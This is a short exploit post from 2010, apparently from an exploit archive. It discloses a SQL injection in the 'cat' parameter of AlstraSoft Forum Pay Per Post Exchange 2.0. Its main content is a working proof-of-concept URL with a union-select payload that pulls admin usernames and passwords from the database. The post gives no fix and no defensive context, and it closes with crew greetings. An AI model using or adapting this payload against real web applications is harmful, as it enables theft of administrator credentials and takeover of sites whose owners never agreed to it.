Forum Pay Per Post Exchange 2.0 (cat) SQL Injection Vulnerability

-----------------------------------------------------------------------
   Forum Pay Per Post Exchange 2.0 (cat) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m (v3n0m666[at]live[dot]com)
Site    	: http://yogyacarderlink.web.id/
Date		: December, 22-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00

Application	: Forum Pay Per Post
Price		: $175
Version		: 2.0 Other versions may also be affected
Vendor  	: http://alstrasoft.com/

Exploit & p0c
_____________

**[SQLi]
http://127.0.0.1/[path]/index.php?menu=browse&cat=-9999+union+all+select+1,2,3,group_concat(auser,char(58),apass),5,6,7,8,9+from+admin--
_________________________________________________

All YOGYACARDERLINK Crew & My Beloved Jovita Andy
_________________________________________________